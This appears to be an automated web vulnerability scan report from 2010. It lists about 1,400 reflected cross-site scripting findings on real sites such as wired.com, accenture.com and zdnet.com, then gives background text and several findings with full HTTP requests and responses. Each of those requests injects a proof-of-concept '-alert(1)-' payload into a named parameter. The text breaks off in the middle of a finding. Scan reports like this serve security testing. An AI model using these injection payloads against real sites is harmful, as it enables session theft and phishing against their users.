1.1219. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 [REST URL parameter 2]

1.1220. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 [REST URL parameter 3]

1.1221. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 [REST URL parameter 3]

1.1222. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 [REST URL parameter 4]

1.1223. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 [REST URL parameter 5]

1.1224. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 [REST URL parameter 6]

1.1225. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 1]

1.1226. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 1]

1.1227. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 2]

1.1228. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 2]

1.1229. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 3]

1.1230. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 3]

1.1231. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 4]

1.1232. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 5]

1.1233. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 6]

1.1234. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 1]

1.1235. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 1]

1.1236. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 2]

1.1237. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 2]

1.1238. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 3]

1.1239. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 3]

1.1240. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 4]

1.1241. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 5]

1.1242. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 6]

1.1243. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 1]

1.1244. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 1]

1.1245. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 2]

1.1246. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 2]

1.1247. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 3]

1.1248. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 3]

1.1249. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 4]

1.1250. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 5]

1.1251. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 6]

1.1252. http://www.wired.com/video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 1]

1.1253. http://www.wired.com/video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 1]

1.1254. http://www.wired.com/video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 2]

1.1255. http://www.wired.com/video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 2]

1.1256. http://www.wired.com/video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 3]

1.1257. http://www.wired.com/video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 3]

1.1258. http://www.wired.com/video/october-madness-meets-sharktoberfest/637752381001 [REST URL parameter 1]

1.1259. http://www.wired.com/video/october-madness-meets-sharktoberfest/637752381001 [REST URL parameter 1]

1.1260. http://www.wired.com/video/october-madness-meets-sharktoberfest/637752381001 [REST URL parameter 2]

1.1261. http://www.wired.com/video/october-madness-meets-sharktoberfest/637752381001 [REST URL parameter 2]

1.1262. http://www.wired.com/video/october-madness-meets-sharktoberfest/637752381001 [REST URL parameter 3]

1.1263. http://www.wired.com/video/october-madness-meets-sharktoberfest/637752381001 [REST URL parameter 3]

1.1264. http://www.wired.com/video/reddit [REST URL parameter 1]

1.1265. http://www.wired.com/video/reddit [REST URL parameter 2]

1.1266. http://www.wired.com/video/reddit [REST URL parameter 2]

1.1267. http://www.wired.com/video/science [REST URL parameter 1]

1.1268. http://www.wired.com/video/science [REST URL parameter 2]

1.1269. http://www.wired.com/video/science [REST URL parameter 2]

1.1270. http://www.wired.com/video/search/ [REST URL parameter 1]

1.1271. http://www.wired.com/video/search/ [REST URL parameter 2]

1.1272. http://www.wired.com/video/search/ [REST URL parameter 2]

1.1273. http://www.wired.com/video/security [REST URL parameter 1]

1.1274. http://www.wired.com/video/security [REST URL parameter 2]

1.1275. http://www.wired.com/video/security [REST URL parameter 2]

1.1276. http://www.wired.com/video/stars-line-up-for-tron-game--evolution/645408465001 [REST URL parameter 1]

1.1277. http://www.wired.com/video/stars-line-up-for-tron-game--evolution/645408465001 [REST URL parameter 1]

1.1278. http://www.wired.com/video/stars-line-up-for-tron-game--evolution/645408465001 [REST URL parameter 2]

1.1279. http://www.wired.com/video/stars-line-up-for-tron-game--evolution/645408465001 [REST URL parameter 2]

1.1280. http://www.wired.com/video/stars-line-up-for-tron-game--evolution/645408465001 [REST URL parameter 3]

1.1281. http://www.wired.com/video/stars-line-up-for-tron-game--evolution/645408465001 [REST URL parameter 3]

1.1282. http://www.wired.com/video/the-casting-of-galaxy-quest/21738564001 [REST URL parameter 1]

1.1283. http://www.wired.com/video/the-casting-of-galaxy-quest/21738564001 [REST URL parameter 1]

1.1284. http://www.wired.com/video/the-casting-of-galaxy-quest/21738564001 [REST URL parameter 2]

1.1285. http://www.wired.com/video/the-casting-of-galaxy-quest/21738564001 [REST URL parameter 2]

1.1286. http://www.wired.com/video/the-casting-of-galaxy-quest/21738564001 [REST URL parameter 3]

1.1287. http://www.wired.com/video/the-casting-of-galaxy-quest/21738564001 [REST URL parameter 3]

1.1288. http://www.wired.com/video/wired-magazine [REST URL parameter 1]

1.1289. http://www.wired.com/video/wired-magazine [REST URL parameter 1]

1.1290. http://www.wired.com/video/wired-magazine [REST URL parameter 2]

1.1291. http://www.wired.com/video/wired-magazine [REST URL parameter 2]

1.1292. http://www.wired.com/wired/coverbrowser/ [REST URL parameter 2]

1.1293. http://www.wired.com/wired/coverbrowser/1993 [REST URL parameter 2]

1.1294. http://www.wired.com/wired/coverbrowser/1993 [REST URL parameter 3]

1.1295. http://www.wired.com/wired/coverbrowser/1994 [REST URL parameter 2]

1.1296. http://www.wired.com/wired/coverbrowser/1994 [REST URL parameter 3]

1.1297. http://www.wired.com/wired/coverbrowser/1995 [REST URL parameter 2]

1.1298. http://www.wired.com/wired/coverbrowser/1995 [REST URL parameter 3]

1.1299. http://www.wired.com/wired/coverbrowser/1996 [REST URL parameter 2]

1.1300. http://www.wired.com/wired/coverbrowser/1996 [REST URL parameter 3]

1.1301. http://www.wired.com/wired/coverbrowser/1997 [REST URL parameter 2]

1.1302. http://www.wired.com/wired/coverbrowser/1997 [REST URL parameter 3]

1.1303. http://www.wired.com/wired/coverbrowser/1998 [REST URL parameter 2]

1.1304. http://www.wired.com/wired/coverbrowser/1998 [REST URL parameter 3]

1.1305. http://www.wired.com/wired/coverbrowser/1999 [REST URL parameter 2]

1.1306. http://www.wired.com/wired/coverbrowser/1999 [REST URL parameter 3]

1.1307. http://www.wired.com/wired/coverbrowser/2000 [REST URL parameter 2]

1.1308. http://www.wired.com/wired/coverbrowser/2000 [REST URL parameter 3]

1.1309. http://www.wired.com/wired/coverbrowser/2001 [REST URL parameter 2]

1.1310. http://www.wired.com/wired/coverbrowser/2001 [REST URL parameter 3]

1.1311. http://www.wired.com/wired/coverbrowser/2002 [REST URL parameter 2]

1.1312. http://www.wired.com/wired/coverbrowser/2002 [REST URL parameter 3]

1.1313. http://www.wired.com/wired/coverbrowser/2003 [REST URL parameter 2]

1.1314. http://www.wired.com/wired/coverbrowser/2003 [REST URL parameter 3]

1.1315. http://www.wired.com/wired/coverbrowser/2004 [REST URL parameter 2]

1.1316. http://www.wired.com/wired/coverbrowser/2004 [REST URL parameter 3]

1.1317. http://www.wired.com/wired/coverbrowser/2005 [REST URL parameter 2]

1.1318. http://www.wired.com/wired/coverbrowser/2005 [REST URL parameter 3]

1.1319. http://www.wired.com/wired/coverbrowser/2006 [REST URL parameter 2]

1.1320. http://www.wired.com/wired/coverbrowser/2006 [REST URL parameter 3]

1.1321. http://www.wired.com/wired/coverbrowser/2007 [REST URL parameter 2]

1.1322. http://www.wired.com/wired/coverbrowser/2007 [REST URL parameter 3]

1.1323. http://www.wired.com/wired/coverbrowser/2008 [REST URL parameter 2]

1.1324. http://www.wired.com/wired/coverbrowser/2008 [REST URL parameter 3]

1.1325. http://www.wired.com/wired/coverbrowser/2009 [REST URL parameter 2]

1.1326. http://www.wired.com/wired/coverbrowser/2009 [REST URL parameter 3]

1.1327. http://www.wired.com/wired/issue/15-06/ [REST URL parameter 2]

1.1328. http://www.wired.com/wired/issue/15-06/ [REST URL parameter 3]

1.1329. http://www.wired.com/wired/issue/15-07/ [REST URL parameter 2]

1.1330. http://www.wired.com/wired/issue/15-07/ [REST URL parameter 3]

1.1331. http://www.wired.com/wired/issue/15-08/ [REST URL parameter 2]

1.1332. http://www.wired.com/wired/issue/15-08/ [REST URL parameter 3]

1.1333. http://www.wired.com/wired/issue/15-09/ [REST URL parameter 2]

1.1334. http://www.wired.com/wired/issue/15-09/ [REST URL parameter 3]

1.1335. http://www.wired.com/wired/issue/15-10/ [REST URL parameter 2]

1.1336. http://www.wired.com/wired/issue/15-10/ [REST URL parameter 3]

1.1337. http://www.wired.com/wired/issue/15-11/ [REST URL parameter 2]

1.1338. http://www.wired.com/wired/issue/15-11/ [REST URL parameter 3]

1.1339. http://www.wired.com/wired/issue/15-12/ [REST URL parameter 2]

1.1340. http://www.wired.com/wired/issue/15-12/ [REST URL parameter 3]

1.1341. http://www.wired.com/wired/issue/16-01/ [REST URL parameter 2]

1.1342. http://www.wired.com/wired/issue/16-01/ [REST URL parameter 3]

1.1343. http://www.wired.com/wired/issue/16-02/ [REST URL parameter 2]

1.1344. http://www.wired.com/wired/issue/16-02/ [REST URL parameter 3]

1.1345. http://www.wired.com/wired/issue/16-03/ [REST URL parameter 2]

1.1346. http://www.wired.com/wired/issue/16-03/ [REST URL parameter 3]

1.1347. http://www.wired.com/wired/issue/16-04/ [REST URL parameter 2]

1.1348. http://www.wired.com/wired/issue/16-04/ [REST URL parameter 3]

1.1349. http://www.wired.com/wired/issue/16-05/ [REST URL parameter 2]

1.1350. http://www.wired.com/wired/issue/16-05/ [REST URL parameter 3]

1.1351. http://www.wired.com/wired/issue/16-06 [REST URL parameter 2]

1.1352. http://www.wired.com/wired/issue/16-06 [REST URL parameter 3]

1.1353. http://www.wired.com/wired/issue/16-07 [REST URL parameter 2]

1.1354. http://www.wired.com/wired/issue/16-07 [REST URL parameter 3]

1.1355. http://www.wired.com/wired/issue/16-08 [REST URL parameter 2]

1.1356. http://www.wired.com/wired/issue/16-08 [REST URL parameter 3]

1.1357. http://www.wired.com/wired/issue/16-09 [REST URL parameter 2]

1.1358. http://www.wired.com/wired/issue/16-09 [REST URL parameter 3]

1.1359. http://www.wired.com/wired/issue/16-10 [REST URL parameter 2]

1.1360. http://www.wired.com/wired/issue/16-10 [REST URL parameter 3]

1.1361. http://www.wired.com/wired/issue/16-11 [REST URL parameter 2]

1.1362. http://www.wired.com/wired/issue/16-11 [REST URL parameter 3]

1.1363. http://www.wired.com/wired/issue/16-12 [REST URL parameter 2]

1.1364. http://www.wired.com/wired/issue/16-12 [REST URL parameter 3]

1.1365. http://www.wired.com/wired/issue/17-01 [REST URL parameter 2]

1.1366. http://www.wired.com/wired/issue/17-01 [REST URL parameter 3]

1.1367. http://www.wired.com/wired/issue/17-02 [REST URL parameter 2]

1.1368. http://www.wired.com/wired/issue/17-02 [REST URL parameter 3]

1.1369. http://www.wired.com/wired/issue/17-03 [REST URL parameter 2]

1.1370. http://www.wired.com/wired/issue/17-03 [REST URL parameter 3]

1.1371. http://www.wired.com/wired/issue/17-04 [REST URL parameter 2]

1.1372. http://www.wired.com/wired/issue/17-04 [REST URL parameter 3]

1.1373. http://www.wired.com/wired/issue/17-05 [REST URL parameter 2]

1.1374. http://www.wired.com/wired/issue/17-05 [REST URL parameter 3]

1.1375. http://www.wired.com/wired/issue/17-06 [REST URL parameter 2]

1.1376. http://www.wired.com/wired/issue/17-06 [REST URL parameter 3]

1.1377. http://www.wired.com/wired/issue/17-07 [REST URL parameter 2]

1.1378. http://www.wired.com/wired/issue/17-07 [REST URL parameter 3]

1.1379. http://www.wired.com/wired/issue/17-08 [REST URL parameter 2]

1.1380. http://www.wired.com/wired/issue/17-08 [REST URL parameter 3]

1.1381. http://www.wired.com/wired/issue/17-09 [REST URL parameter 2]

1.1382. http://www.wired.com/wired/issue/17-09 [REST URL parameter 3]

1.1383. http://www.wired.com/wired/issue/17-10 [REST URL parameter 2]

1.1384. http://www.wired.com/wired/issue/17-10 [REST URL parameter 3]

1.1385. http://www.wired.com/wired/issue/geekipedia [REST URL parameter 2]

1.1386. http://www.wired.com/wired/issue/geekipedia [REST URL parameter 3]

1.1387. http://www.wired.com/wired/issue/test2007/ [REST URL parameter 2]

1.1388. http://www.wired.com/wired/issue/test2007/ [REST URL parameter 3]

1.1389. http://www.wisegeek.com/who-is-ferdinand-marcos.htm [REST URL parameter 1]

1.1390. http://www.wisegeek.com/who-is-ferdinand-marcos.htm [name of an arbitrarily supplied request parameter]

1.1391. http://www.wisegeek.com/who-is-ferdinand-marcos.htm [name of an arbitrarily supplied request parameter]

1.1392. http://www.xml.com/pub/a/2003/07/23/extendingrss.html [name of an arbitrarily supplied request parameter]

1.1393. http://www.xml.com/pub/a/2003/07/23/extendingrss.html [name of an arbitrarily supplied request parameter]

1.1394. http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283 [REST URL parameter 4]

1.1395. http://www.zdnet.com/blog/microsoft/rss [REST URL parameter 3]

1.1396. http://www.zdnet.com/search [REST URL parameter 1]

1.1397. http://www2.colum.edu/course_descriptions/52-3804.html [REST URL parameter 1]

1.1398. http://www2.colum.edu/course_descriptions/52-3804.html [REST URL parameter 1]

1.1399. http://www2.colum.edu/course_descriptions/52-3804.html [REST URL parameter 2]

1.1400. http://autos.aol.com/ [Referer HTTP header]

1.1401. http://newsroom.accenture.com/article_display.cfm [Referer HTTP header]

1.1402. http://www.accenture.com/Accenture/Templates/WidescreenNavigationTemplate.aspx [Referer HTTP header]

1.1403. http://www.accenture.com/accenture/search/search.aspx [Referer HTTP header]

1.1404. https://www.accenture.com/Accenture/Registration/EAN.aspx [Referer HTTP header]

1.1405. https://www.accenture.com/Accenture/Registration/GenericTemplate.aspx [Referer HTTP header]

1.1406. https://www.accenture.com/Accenture/Registration/IMFormTemplate.aspx [Referer HTTP header]

1.1407. https://www.accenture.com/Accenture/Registration/LoginPage.aspx [Referer HTTP header]

1.1408. https://www.accenture.com/Accenture/Registration/SendPassword.aspx [Referer HTTP header]

1.1409. https://www.accenture.com/Accenture/Registration/SignOutPage.aspx [Referer HTTP header]

1.1410. https://www.accenture.com/Global/Registration/Email_This.htm [Referer HTTP header]

1.1411. https://www.accenture.com/Global/Registration/FeedbackForm.htm [Referer HTTP header]

1.1412. https://www.accenture.com/Global/Registration/MailTo.htm [Referer HTTP header]

1.1413. https://www.accenture.com/Global/Registration/Personalization [Referer HTTP header]

1.1414. https://www.accenture.com/Global/Registration/RequestServices.htm [Referer HTTP header]

1.1415. https://www.accenture.com/accenture/registration/PrintThis.aspx [Referer HTTP header]

1.1416. https://www.accenture.com/accenture/registration/PrintThis.aspx [Referer HTTP header]

1.1417. https://www.accenture.com/global/registration/careerssample [Referer HTTP header]

1.1418. http://www.addthis.com/bookmark.php [Referer HTTP header]

1.1419. http://www.addthis.com/bookmark.php [Referer HTTP header]

1.1420. http://www.pollingplacephotoproject.org/ [User-Agent HTTP header]

1.1421. http://www.salesforce.com/servlet/servlet.WebToLead [Referer HTTP header]

1.1422. https://www.salesforce.com/servlet/servlet.WebToLead [Referer HTTP header]

1.1423. http://www.webwag.com/wwgthis.php [Referer HTTP header]

1.1424. http://www.windowsfordevices.com/ [Referer HTTP header]

1.1425. http://www.zazzle.com/geekdad_mug-168641877038204487 [Referer HTTP header]

1.1426. http://www.zazzle.com/geekdad_mug-168641877038204487 [Referer HTTP header]

1.1427. http://www.zdnet.com/ [Referer HTTP header]

1.1428. http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283 [Referer HTTP header]

1.1429. http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283 [Referer HTTP header]

1.1430. http://www.zdnet.com/search [Referer HTTP header]

1.1431. http://www.zdnet.com/search [Referer HTTP header]

1.1432. http://click.linksynergy.com/fs-bin/click [RD_PARM1 parameter]

1.1433. http://click.linksynergy.com/fs-bin/click [RD_PARM1 parameter]

1.1434. http://www.accenture.com/Accenture/Registration/EAN.aspx [REST URL parameter 3]

1.1435. http://www.accenture.com/Accenture/Registration/LoginPage.aspx [REST URL parameter 3]

1.1436. http://www.accenture.com/Accenture/Registration/SignOutPage.aspx [REST URL parameter 1]

1.1437. http://www.accenture.com/Accenture/Registration/SignOutPage.aspx [REST URL parameter 2]

1.1438. http://www.accenture.com/Accenture/Registration/SignOutPage.aspx [REST URL parameter 3]



1. Cross-site scripting (reflected)
There are 1438 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://4qinvite.4q.iperceptions.com/1.aspx [sdfc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://4qinvite.4q.iperceptions.com
Path:   /1.aspx

Issue detail

The value of the sdfc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23d3f'-alert(1)-'3687970a447 was submitted in the sdfc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1.aspx?sdfc=299f610e-24038-38153450-25fe-438c-8517-2aca3243ff7523d3f'-alert(1)-'3687970a447&lID=1&loc=4Q-WEB2 HTTP/1.1
Host: 4qinvite.4q.iperceptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Nov 2010 17:17:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Srv-By: 4Q-INVITE2
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=auwb01i1a2g3ks3mlhwi5jmt; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1089

var sID= '24038'; var sC= 'IPE24038'; var brow= 'IE'; var vers= '7.0'; var lID= '1'; var loc= '4Q-WEB2'; var ps= 'sdfc=299f610e-24038-38153450-25fe-438c-8517-2aca3243ff7523d3f'-alert(1)-'3687970a447&lID=1&loc=4Q-WEB2';var sGA='';function setupGA(url) { return url;}var tC= 'IPEt'; var tCv='?'; CCook(tC,tC,0); tCv= GetC(tC);if (GetC(sC)==null && tCv != null) {CCook(sC,sC,30); Ld();} DCook(tC);funct
...[SNIP]...

1.2. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [b parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 956a5"-alert(1)-"417ab19093e was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5956a5"-alert(1)-"417ab19093e&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:05:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
/181/%2a/z%3B231241976%3B1-0%3B0%3B55844876%3B4307-300/250%3B38009999/38027756/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5956a5"-alert(1)-"417ab19093e&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0
...[SNIP]...

1.3. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f470"-alert(1)-"d3cac9a52e0 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=200122536f470"-alert(1)-"d3cac9a52e0&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:09:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
-300/250%3B38010001/38027758/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=200122536f470"-alert(1)-"d3cac9a52e0&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event
...[SNIP]...

1.4. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [count parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9600a"-alert(1)-"d571cc2dd60 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=9600a"-alert(1)-"d571cc2dd60&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
